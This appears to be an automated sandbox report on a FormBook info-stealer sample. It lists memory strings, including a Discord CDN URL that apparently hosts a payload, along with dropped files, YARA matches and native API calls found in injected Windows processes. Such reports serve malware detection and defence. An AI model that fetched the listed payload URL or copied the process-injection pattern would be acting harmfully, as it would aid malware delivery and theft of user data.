Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653912925.0000000000789000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/831802482459672609/839049205866561576/Vylsmojatnhhurydzinydcl
Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown

HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49739 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPE

System Summary:

Detected FormBook malware

Show sources

Source: C:\Windows\SysWOW64\ipconfig.exe	Dropped file: C:\Users\user\AppData\Roaming\50M6QC82\50Mlogri.ini			Jump to dropped file
Source: C:\Windows\SysWOW64\ipconfig.exe	Dropped file: C:\Users\user\AppData\Roaming\50M6QC82\50Mlogrv.ini			Jump to dropped file

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889780 NtMapViewOfSection,LdrInitializeThunk,	2_2_03889780
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038897A0 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_038897A0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889710 NtQueryInformationToken,LdrInitializeThunk,	2_2_03889710
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038896E0 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_038896E0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889A00 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_03889A00
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889A20 NtResumeThread,LdrInitializeThunk,	2_2_03889A20
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889A50 NtCreateFile,LdrInitializeThunk,	2_2_03889A50
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889660 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_03889660
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038899A0 NtCreateSection,LdrInitializeThunk,	2_2_038899A0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038895D0 NtClose,LdrInitializeThunk,	2_2_038895D0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889910 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_03889910
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889540 NtReadFile,LdrInitializeThunk,	2_2_03889540
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038898F0 NtReadVirtualMemory,LdrInitializeThunk,	2_2_038898F0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889840 NtDelayExecution,LdrInitializeThunk,	2_2_03889840
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889860 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03889860
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0388A3B0 NtGetContextThread,	2_2_0388A3B0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889FE0 NtCreateMutant,	2_2_03889FE0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889B00 NtSetValueKey,	2_2_03889B00
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0388A710 NtOpenProcessToken,	2_2_0388A710
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889730 NtQueryVirtualMemory,	2_2_03889730
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889760 NtOpenProcess,	2_2_03889760
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889770 NtSetInformationFile,	2_2_03889770
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0388A770 NtOpenThread,	2_2_0388A770
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889A80 NtOpenDirectoryObject,	2_2_03889A80
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038896D0 NtCreateKey,	2_2_038896D0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889610 NtEnumerateValueKey,	2_2_03889610
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889A10 NtQuerySection,	2_2_03889A10
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889650 NtQueryValueKey,	2_2_03889650
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889670 NtQueryInformationProcess,	2_2_03889670
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038899D0 NtCreateProcessEx,	2_2_038899D0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038895F0 NtQueryInformationFile,	2_2_038895F0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889520 NtWaitForSingleObject,	2_2_03889520
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0388AD30 NtSetContextThread,	2_2_0388AD30
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889950 NtQueueApcThread,	2_2_03889950
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889560 NtWriteFile,	2_2_03889560
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038898A0 NtWriteVirtualMemory,	2_2_038898A0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03889820 NtEnumerateKey,	2_2_03889820
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0388B040 NtSuspendThread,	2_2_0388B040
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_10429850 NtCreateFile,	2_2_10429850
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_10429900 NtReadFile,	2_2_10429900
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_10429980 NtClose,	2_2_10429980
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_10429A30 NtAllocateVirtualMemory,	2_2_10429A30
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042984A NtCreateFile,	2_2_1042984A
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_104298FB NtReadFile,	2_2_104298FB
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042997A NtClose,	2_2_1042997A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9860 NtQuerySystemInformation,LdrInitializeThunk,	10_2_00BC9860
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9840 NtDelayExecution,LdrInitializeThunk,	10_2_00BC9840
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC99A0 NtCreateSection,LdrInitializeThunk,	10_2_00BC99A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	10_2_00BC9910
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9A50 NtCreateFile,LdrInitializeThunk,	10_2_00BC9A50
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9B00 NtSetValueKey,LdrInitializeThunk,	10_2_00BC9B00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC95D0 NtClose,LdrInitializeThunk,	10_2_00BC95D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9560 NtWriteFile,LdrInitializeThunk,	10_2_00BC9560
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9540 NtReadFile,LdrInitializeThunk,	10_2_00BC9540
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC96E0 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_00BC96E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC96D0 NtCreateKey,LdrInitializeThunk,	10_2_00BC96D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9780 NtMapViewOfSection,LdrInitializeThunk,	10_2_00BC9780
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9FE0 NtCreateMutant,LdrInitializeThunk,	10_2_00BC9FE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9710 NtQueryInformationToken,LdrInitializeThunk,	10_2_00BC9710
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9770 NtSetInformationFile,LdrInitializeThunk,	10_2_00BC9770
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC98A0 NtWriteVirtualMemory,	10_2_00BC98A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC98F0 NtReadVirtualMemory,	10_2_00BC98F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9820 NtEnumerateKey,	10_2_00BC9820
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BCB040 NtSuspendThread,	10_2_00BCB040
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC99D0 NtCreateProcessEx,	10_2_00BC99D0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9950 NtQueueApcThread,	10_2_00BC9950
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9A80 NtOpenDirectoryObject,	10_2_00BC9A80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9A20 NtResumeThread,	10_2_00BC9A20
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9A10 NtQuerySection,	10_2_00BC9A10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9A00 NtProtectVirtualMemory,	10_2_00BC9A00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BCA3B0 NtGetContextThread,	10_2_00BCA3B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC95F0 NtQueryInformationFile,	10_2_00BC95F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BCAD30 NtSetContextThread,	10_2_00BCAD30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9520 NtWaitForSingleObject,	10_2_00BC9520
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9610 NtEnumerateValueKey,	10_2_00BC9610
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9670 NtQueryInformationProcess,	10_2_00BC9670
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9660 NtAllocateVirtualMemory,	10_2_00BC9660
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9650 NtQueryValueKey,	10_2_00BC9650
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC97A0 NtUnmapViewOfSection,	10_2_00BC97A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9730 NtQueryVirtualMemory,	10_2_00BC9730
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BCA710 NtOpenProcessToken,	10_2_00BCA710
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BCA770 NtOpenThread,	10_2_00BCA770
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BC9760 NtOpenProcess,	10_2_00BC9760
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00169850 NtCreateFile,	10_2_00169850
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00169900 NtReadFile,	10_2_00169900
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00169980 NtClose,	10_2_00169980
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_0016984A NtCreateFile,	10_2_0016984A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_001698FB NtReadFile,	10_2_001698FB
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_0016997A NtClose,	10_2_0016997A
Source: C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe	Code function: 21_2_00F1146F RtlInitUnicodeString,NtOpenEvent,NtCreateEvent,NtOpenEvent,WaitForSingleObject,NtClose,NetJoinDomain,	21_2_00F1146F

Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0387EBB0	2_2_0387EBB0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03866E30	2_2_03866E30
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03872581	2_2_03872581
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385D5E0	2_2_0385D5E0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0384F900	2_2_0384F900
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03840D20	2_2_03840D20
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03864120	2_2_03864120
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03911D55	2_2_03911D55
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385B090	2_2_0385B090
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_038720A0	2_2_038720A0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_03901002	2_2_03901002
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_0385841F	2_2_0385841F
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_10411030	2_2_10411030
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042CA46	2_2_1042CA46
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042DA5E	2_2_1042DA5E
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042D29D	2_2_1042D29D
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042CB3E	2_2_1042CB3E
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042D4B3	2_2_1042D4B3
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_10412D90	2_2_10412D90
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042DFE6	2_2_1042DFE6
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_1042D7F9	2_2_1042D7F9
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_10419F80	2_2_10419F80
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 2_2_10412FB0	2_2_10412FB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB20A0	10_2_00BB20A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9B090	10_2_00B9B090
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C528EC	10_2_00C528EC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C520A8	10_2_00C520A8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C41002	10_2_00C41002
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BA4120	10_2_00BA4120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B8F900	10_2_00B8F900
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C522AE	10_2_00C522AE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BBEBB0	10_2_00BBEBB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4DBD2	10_2_00C4DBD2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C52B28	10_2_00C52B28
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4D466	10_2_00C4D466
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9841F	10_2_00B9841F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C525DD	10_2_00C525DD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BB2581	10_2_00BB2581
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B9D5E0	10_2_00B9D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C51D55	10_2_00C51D55
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00B80D20	10_2_00B80D20
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C52D07	10_2_00C52D07
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C52EF7	10_2_00C52EF7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00BA6E30	10_2_00BA6E30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C4D616	10_2_00C4D616
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00C51FF1	10_2_00C51FF1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_0016DA5E	10_2_0016DA5E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_0016CA46	10_2_0016CA46
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_0016D4B3	10_2_0016D4B3
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00152D90	10_2_00152D90
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00159F80	10_2_00159F80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_00152FB0	10_2_00152FB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_0016D7F9	10_2_0016D7F9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 10_2_0016DFE6	10_2_0016DFE6

Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 00B8B150 appears 35 times
Source: C:\Windows\SysWOW64\secinit.exe	Code function: String function: 0384B150 appears 32 times

Source: f97e137e_by_Libranalysis.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

